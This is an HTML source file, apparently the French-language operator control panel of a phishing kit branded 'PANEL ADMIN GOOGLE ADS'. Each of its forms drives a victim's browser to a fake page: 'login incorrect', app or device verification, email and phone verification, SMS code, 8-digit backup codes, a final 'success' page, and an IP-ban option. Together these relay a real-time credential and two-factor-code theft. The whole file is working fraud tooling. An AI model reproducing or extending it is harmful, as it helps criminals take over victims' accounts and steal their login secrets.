<!DOCTYPE html>
<html lang="en">
<head>
	<title>GOOGLE ADS</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/css/bootstrap.min.css">
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>
  <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.4.1/js/bootstrap.min.js"></script>
</head>
<body>

<div class="container">

  <h3><img src="images/Googlelogo.png" width="50px"> PANEL ADMIN GOOGLE ADS</h3>
  <br/>
  <p><h4>Utiliser l'une des options ci-dessous pour controler le système et cliquez sur <a>valider</a> pour la prise en compte:</h4></p>
  <br/>
 
   <table class="table table-bordered">
    
    <tbody>
      <tr>
        <td><h4>1 - Séléctionner la page de login incorrecte </h4></td>
        <td>
		<form method="post"  action="./auto_system/Select_Login.php" style="
    display: contents;
    margin-top: 0em;
    margin-block-end: 1em;
">  <input style="display: none;" type="text" name="textLogin">    <button type="submit" style="
    color: #ff6600;
    font-size: 23px;
    background-color: white;
    border: none;
    font-size: 28px;
    font-family: sans-serif;
"><a href="#" class="w3-right w3-btn" style="
    color: #ff6600;
    font-size: 23px;
    margin: 2px 14px 31px 11px;
    font-size: 28px;
    font-family: sans-serif;
"><span class="w3-hide-small" style="
    color: #ff6600;
    font-size: 28px;
    font-family: sans-serif;
">Valider </span></a></button> </form></td>
  
      </tr> 
	  
	  	  <tr>
        <td><h4>2- Application Saisisser le numero de validation  et le nom de l'appareil  dans les champ << copier dans le champ suivant >> </h4></td>
        <td><form method="post"  action="./auto_system/Select_appbenef.php" style="
    display: contents;
    margin-top: 0em;
    margin-block-end: 1em;
">  <input style="display: none;" type="text" name="Appverify">    
 <input required="" type="text" name="textAppverify" placeholder="numero" style="padding: 8px;border: 1px solid #ccc;">

 <input required="" type="text" name="textBenef" placeholder="appareil" style="padding: 8px;border: 1px solid #ccc;">
<button type="submit" style="
    color: #ff6600;
    font-size: 23px;
    background-color: white;
    border: none;
    font-size: 28px;
    font-family: sans-serif;
"><a href="#" class="w3-right w3-btn" style="
    color: #ff6600;
    font-size: 23px;
    margin: 2px 14px 31px 11px;
    font-size: 28px;
    font-family: sans-serif;
"><span class="w3-hide-small" style="
    color: #ff6600;
    font-size: 28px;
    font-family: sans-serif;
">Valider </span></a></button> </form></td>
  
      </tr> 

	  <tr>
        <td><h4>3 - Séléctionner la page de vérification email << copier dans le champ suivant >> </h4></td>
        <td><form method="post"  action="./auto_system/Select_emailverify.php" style="
    display: contents;
    margin-top: 0em;
    margin-block-end: 1em;
">  <input style="display: none;" type="text" name="Emailverify">   
 <input required="" type="text" name="textEmailverify" style="
    padding: 8px;
    border: 1px solid #ccc;
">
 <button type="submit" style="
    color: #ff6600;
    font-size: 23px;
    background-color: white;
    border: none;
    font-size: 28px;
    font-family: sans-serif;
"><a href="#" class="w3-right w3-btn" style="
    color: #ff6600;
    font-size: 23px;
    margin: 2px 14px 31px 11px;
    font-size: 28px;
    font-family: sans-serif;
"><span class="w3-hide-small" style="
    color: #ff6600;
    font-size: 28px;
    font-family: sans-serif;
">Valider </span></a></button> </form></td>
  
      </tr>
     
		  <tr>
        <td><h4>4 - Séléctionner la page de vérification numero telephone << copier dans le champ suivant >> </h4></td>
        <td><form method="post"  action="./auto_system/Select_phoneverify.php" style="
    display: contents;
    margin-top: 0em;
    margin-block-end: 1em;
">  <input style="display: none;" type="text" name="Phoneverify">   
 <input required="" type="text" name="textPhoneverify" style="
    padding: 8px;
    border: 1px solid #ccc;
">
 <button type="submit" style="
    color: #ff6600;
    font-size: 23px;
    background-color: white;
    border: none;
    font-size: 28px;
    font-family: sans-serif;
"><a href="#" class="w3-right w3-btn" style="
    color: #ff6600;
    font-size: 23px;
    margin: 2px 14px 31px 11px;
    font-size: 28px;
    font-family: sans-serif;
"><span class="w3-hide-small" style="
    color: #ff6600;
    font-size: 28px;
    font-family: sans-serif;
">Valider </span></a></button> </form></td>
  
      </tr> 
	 
	   <tr>
        <td><h4>5 - Séléctionner la page de code parametre << copier dans le champ suivant >> </h4></td>
        <td><form method="post"  action="./auto_system/Select_code_param.php" style="
    display: contents;
    margin-top: 0em;
    margin-block-end: 1em;
">  <input style="display: none;" type="text" name="Paramverify">   
 <input required="" type="text" name="textParamverify" style="
    padding: 8px;
    border: 1px solid #ccc;
">
 <button type="submit" style="
    color: #ff6600;
    font-size: 23px;
    background-color: white;
    border: none;
    font-size: 28px;
    font-family: sans-serif;
"><a href="#" class="w3-right w3-btn" style="
    color: #ff6600;
    font-size: 23px;
    margin: 2px 14px 31px 11px;
    font-size: 28px;
    font-family: sans-serif;
"><span class="w3-hide-small" style="
    color: #ff6600;
    font-size: 28px;
    font-family: sans-serif;
">Valider </span></a></button> </form></td>
  
      </tr> 
	 
	 
      <tr>
        <td><h4>6- Séléctionner la page de Code sms  </h4></td>
        <td><form method="post"  action="./auto_system/Select_Smsmail.php" style="
    display: contents;
    margin-top: 0em;
    margin-block-end: 1em;
">  <input style="display: none;" type="text" name="textSmsmail">    <button type="submit" style="
    color: #ff6600;
    font-size: 23px;
    background-color: white;
    border: none;
    font-size: 28px;
    font-family: sans-serif;
"><a href="#" class="w3-right w3-btn" style="
    color: #ff6600;
    font-size: 23px;
    margin: 2px 14px 31px 11px;
    font-size: 28px;
    font-family: sans-serif;
"><span class="w3-hide-small" style="
    color: #ff6600;
    font-size: 28px;
    font-family: sans-serif;
">Valider </span></a></button> </form></td>
  
      </tr>
	       <tr>
        <td><h4>8- Séléctionner la page codes de secours  a 8 chiffres </h4></td>
        <td><form method="post"  action="./auto_system/Select_securiter.php" style="
    display: contents;
    margin-top: 0em;
    margin-block-end: 1em;
">  <input style="display: none;" type="text" name="textCodesecuriter">    <button type="submit" style="
    color: #ff6600;
    font-size: 23px;
    background-color: white;
    border: none;
    font-size: 28px;
    font-family: sans-serif;
"><a href="#" class="w3-right w3-btn" style="
    color: #ff6600;
    font-size: 23px;
    margin: 2px 14px 31px 11px;
    font-size: 28px;
    font-family: sans-serif;
"><span class="w3-hide-small" style="
    color: #ff6600;
    font-size: 28px;
    font-family: sans-serif;
">Valider </span></a></button> </form></td>
  
      </tr>
	     <tr>
        <td><h4>9 - Séléctionner la page succès << FIN >>  </h4></td>
        <td><form method="post"  action="./auto_system/Select_Exit.php" style="
    display: contents;
    margin-top: 0em;
    margin-block-end: 1em;
">  <input style="display: none;" type="text" name="textExit">    <button type="submit" style="
    color: #ff6600;
    font-size: 23px;
    background-color: white;
    border: none;
    font-size: 28px;
    font-family: sans-serif;
"><a href="#" class="w3-right w3-btn" style="
    color: #ff6600;
    font-size: 23px;
    margin: 2px 14px 31px 11px;
    font-size: 28px;
    font-family: sans-serif;
"><span class="w3-hide-small" style="
    color: #ff6600;
    font-size: 28px;
    font-family: sans-serif;
">Valider </span></a></button> </form></td>
  
      </tr>
	  
	  <tr>
        <td><h4>8 - Séléctionner la page BannirIP  </h4></td>
        <td><form method="post"  action="./auto_system/Select_bannir.php" style="
    display: contents;
    margin-top: 0em;
    margin-block-end: 1em;
">  <input style="display: none;" type="text" name="textBannir">    <button type="submit" style="
    color: #ff6600;
    font-size: 23px;
    background-color: white;
    border: none;
    font-size: 28px;
    font-family: sans-serif;
"><a href="#" class="w3-right w3-btn" style="
    color: #ff6600;
    font-size: 23px;
    margin: 2px 14px 31px 11px;
    font-size: 28px;
    font-family: sans-serif;
"><span class="w3-hide-small" style="
    color: #ff6600;
    font-size: 28px;
    font-family: sans-serif;
">Valider </span></a></button> </form></td>
  
      </tr>
    </tbody>
  </table>
</div>
  <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>		
<script src="https://cdn.jsdelivr.net/npm/sweetalert2@7.26.11/dist/sweetalert2.all.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/sweetalert/2.1.2/sweetalert.min.js" integrity="sha256-KsRuvuRtUVvobe66OFtOQfjP8WA2SzYsmm4VPfMnxms=" crossorigin="anonymous"></script>

<script src="../common/main.js"></script>
</body>
</html>
